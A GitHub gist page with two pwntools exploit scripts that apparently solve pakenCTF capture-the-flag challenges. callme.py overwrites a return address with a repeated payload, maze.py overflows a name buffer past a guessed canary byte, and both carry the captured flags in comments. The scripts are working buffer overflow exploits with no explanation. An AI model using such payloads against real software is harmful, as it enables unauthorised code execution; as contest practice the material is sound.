Skip to content

Instantly share code, notes, and snippets.

@moratorium08

moratorium08/callme.py

Last active November 1, 2020 09:03
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save moratorium08/5d6a9ffbe1a02e055958ff0874b35af6 to your computer and use it in GitHub Desktop.
Save moratorium08/5d6a9ffbe1a02e055958ff0874b35af6 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
callme.py
from __future__ import division, print_function
import random
from pwn import *
import argparse
import time
context.log_level = 'error'
parser = argparse.ArgumentParser()
parser.add_argument(
"--host",
default="127.0.0.1",
help="target host"
)
parser.add_argument(
"--port",
default=3001,
help="target port"
)
parser.add_argument(
'--log',
action='store_true'
)
parser.add_argument(
'--is-gaibu',
action='store_true'
)
args = parser.parse_args()
log = args.log
is_gaibu = args.is_gaibu
if is_gaibu:
host = "3.131.69.179"
port = 12345
else:
host = args.host
port = args.port
def wait_for_attach():
if not is_gaibu:
print('attach?')
raw_input()
def just_u64(x):
return u64(x.ljust(8, '\x00'))
r = remote(host, port)
def recvuntil(x, verbose=True):
s = r.recvuntil(x)
if log and verbose:
print(s)
return s.strip(x)
def recv(n, verbose=True):
s = r.recv(n)
if log and verbose:
print(s)
return s
def recvline(verbose=True):
s = r.recvline()
if log and verbose:
print(s)
return s.strip('\n')
def sendline(s, verbose=True):
if log and verbose:
pass
#print(s)
r.sendline(s)
def send(s, verbose=True):
if log and verbose:
print(s, end='')
r.send(s)
def interactive():
r.interactive()
####################################
def menu(choice):
recvuntil(':')
sendline(str(choice))
# receive and send
def rs(s, new_line=True, r=':'):
recvuntil(r)
s = str(s)
if new_line:
sendline(s)
else:
send(s)
payload = p64(0x00000000040119b)
wait_for_attach()
rs(payload * (256 // 8))
#pakenCTF{bu4Fer_0v6r_410w}
interactive()
Raw
maze.py
from __future__ import division, print_function
import random
from pwn import *
import argparse
import time
context.log_level = 'error'
parser = argparse.ArgumentParser()
parser.add_argument(
"--host",
default="127.0.0.1",
help="target host"
)
parser.add_argument(
"--port",
default=3001,
help="target port"
)
parser.add_argument(
'--log',
action='store_true'
)
parser.add_argument(
'--is-gaibu',
action='store_true'
)
args = parser.parse_args()
log = args.log
is_gaibu = args.is_gaibu
if is_gaibu:
host = "3.131.69.179"
port = 15991
else:
host = args.host
port = args.port
def wait_for_attach():
if not is_gaibu:
print('attach?')
raw_input()
def just_u64(x):
return u64(x.ljust(8, '\x00'))
r = remote(host, port)
def recvuntil(x, verbose=True):
s = r.recvuntil(x)
if log and verbose:
print(s)
return s.strip(x)
def recv(n, verbose=True):
s = r.recv(n)
if log and verbose:
print(s)
return s
def recvline(verbose=True):
s = r.recvline()
if log and verbose:
print(s)
return s.strip('\n')
def sendline(s, verbose=True):
if log and verbose:
pass
#print(s)
r.sendline(s)
def send(s, verbose=True):
if log and verbose:
print(s, end='')
r.send(s)
def interactive():
r.interactive()
####################################
def menu(choice):
recvuntil(':')
sendline(str(choice))
# receive and send
def rs(s, new_line=True, r=':'):
recvuntil(r)
s = str(s)
if new_line:
sendline(s)
else:
send(s)
print('canary?')
canary = int(raw_input())
canary = 0x41
recvuntil('name?')
wait_for_attach()
sendline('A' * 14 + chr(canary) + '.' * 30)
interactive()
# pakenCTF{6ru4e_40rce}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment